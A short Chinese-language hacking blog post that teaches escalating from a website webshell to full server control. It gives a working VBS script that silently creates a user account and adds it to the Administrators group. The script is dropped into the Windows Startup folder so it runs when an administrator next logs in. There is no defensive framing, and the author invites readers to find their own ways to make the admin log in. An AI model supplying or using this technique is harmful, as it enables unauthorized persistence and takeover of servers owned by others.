昔日

webshell写入启动项目提权

豪子′Blog|关注网络安全,关注黑阔动态:

我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限.  


        我们可以查看现在服务器上盘的可读可写目录


        如果说服务器上的 C:\Documents and Settings\All Users\「开始」菜单\程序\启动   ‘目录存在可读可写目录


        那么我们就可以执行上传一个vbs或者bat的脚本进行提权


        这里我就具体来讲解下用vbs脚本进行提权,来添加用户。


        


        1.我们先写一个vbs的添加用户密码的脚本 脚本代码如下 大家可自行修改用户密码。


set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user 用户名 密码  /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators 用户名 /add",0) 


 


 


修改帐号密码后然后复制以上代码 然后保存为.vbs的文件 文件名任意。


        2.保存以后将来vbs脚本上传到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动


        然后我们就提权结束,等目标服务器再次登录的时候即可自动添加帐号密码。


        PS: 对于有耐心的朋友可以通过,这种方法来进行提权尝试。 当然我们的目标是让管理员登录服务器。 至于怎么做大家自行发挥



评论

热度(2)